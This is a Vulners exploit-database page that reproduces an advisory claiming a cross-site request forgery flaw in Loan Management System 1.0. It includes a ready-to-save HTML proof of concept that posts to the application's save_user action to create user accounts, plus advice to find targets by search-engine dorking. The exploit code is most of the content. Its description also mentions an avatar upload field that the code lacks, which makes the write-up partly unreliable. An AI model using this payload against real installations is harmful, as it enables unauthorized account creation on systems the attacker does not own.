Vulners
Lucene search
Loan Management System 1.0 Cross Site Request Forgery
`=============================================================================================================================================
| # Title : Loan Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page :
is a user registration form that allows users to input a username, password, and upload an avatar image.
The form data is then sent via an AJAX request to a server-side script for processing.
[+] Here's a breakdown of how it works:
HTML Structure
Form Elements:
username: A text field where the user can input their username.
password: A password field for entering a password.
img: A file input for uploading an avatar image (restricted to image file types).
Save User Button:
An input element with the type button is used to trigger the saveUser() function when clicked.
[+] JavaScript (AJAX Request)
AJAX Request:
An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).
The request method is POST, and the data is sent to the specified URL.
The onload function checks if the request was successful (status code 200). If it was,
it alerts the user that the save was successful; otherwise, it alerts the user of an error.
[+] save code as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>User Registration</title>
</head>
<body>
<h2>User Registration</h2>
<form id="userForm" enctype="multipart/form-data">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required><br><br>
<input type="button" value="Save User" onclick="saveUser()">
</form>
<script>
function saveUser() {
var form = document.getElementById('userForm');
var formData = new FormData(form);
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);
xhr.onload = function () {
if (xhr.status === 200) {
alert('User saved successfully');
} else {
alert('An error occurred while saving the user');
}
};
xhr.send(formData);
}
</script>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4